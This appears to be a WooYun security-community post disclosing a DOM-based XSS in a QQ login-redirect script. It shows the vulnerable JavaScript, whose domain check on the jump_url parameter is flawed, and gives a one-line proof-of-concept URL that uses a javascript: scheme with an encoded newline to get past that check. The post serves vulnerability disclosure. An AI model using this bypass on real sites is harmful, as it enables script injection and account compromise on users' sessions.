当前位置:WooYun(白帽子技术社区) >> 我们都是猥琐流 >> 一个dom xss
<script type="text/javascript">
//登录跳转页面
(function () {
var queryString = {
split:function (url) {
//url检查正则
//http://vip.qq.com/life/uri/index.html#Related
var regExp = new RegExp('^(?:([^:/?#.]+):)?(?://(?:([^/?#]*)@)?([\\w\\d\\-\\u0100-\\uffff.%]*)(?::([0-9]+))?)?([^?#]+)?(?:\\?([^#]*))?(?:#(.*))?$');
return url.match(regExp);
},
/**
* 解析字符串到对象中,如
* @param {string} str 被解析的字符串
* @param {string='&'} seq 字符串分隔符
* @param {string='='} eq 键值对象分隔符
* @example
* queryString.parse('foo=bar&baz=qux&baz=quux&corge');
* // { foo: 'bar', baz: ['qux', 'quux'], corge: '' }
* @return {Object.<string,string>} 返回解析后的字符串对象
*/
parse:function (str, seq, eq) {
seq = seq || '&';
eq = eq || '=';
var result = {};
if (typeof str == 'string' && str.length > 0) {
//切割字符串
var strArr = str.split(seq);
for (var i = 0, j = strArr.length; i < j; i++) {
var key = "", value = "";
//切割键值字符串
var kvArr = strArr[i].split(eq);
key = decodeURIComponent(kvArr[0]);
value = decodeURIComponent(kvArr.slice(1).join(eq) || "");
if (key) {
//保存键值对
if (typeof result[key] == 'undefined') {
result[key] = value;
} else if (result[key].constructor == "Array") {
result[key].push(value);
} else {
result[key] = [result[key], value];
}
}
}
}
return result;
}
};
//设置domain
var urlComponent = queryString.parse(location.search.replace(/^\?/, ""));
try {
if (typeof urlComponent['domain'] != 'undefined') {
document.domain = urlComponent['domain'];
} else {
document.domain = 'qq.com';
}
} catch (e) {
//如果设置domain出错,如输入domain=abc.com或者domain=testqq.com;
return false;
}
if (typeof urlComponent['jump_url'] != 'undefined') {
//检查当前跳转的url的domain是不是document.domain的子域名
//urlParams[3]就是host
var urlParams = queryString.split(urlComponent['jump_url']);
if (urlParams && typeof urlParams[3] != 'undefined') {
var urlDomain = "." + urlParams[3];
var domainIndex = urlDomain.lastIndexOf("." + document.domain);
var index = urlDomain.length - document.domain.length - 1;
if (domainIndex === index && domainIndex != -1) {
top.window.location.href = urlComponent['jump_url'];
return true;
}
}else if(urlComponent['jump_url']==""){
parent.ptlogin2_onClose();
parent.login_success();
}
}else{
parent.ptlogin2_onClose();
parent.__rdt__();
}
//top != self && top.window.location.reload();
})();
</script>
poc:
sssss.htm?jump_url=javascript://qq.com/%250aalert(1);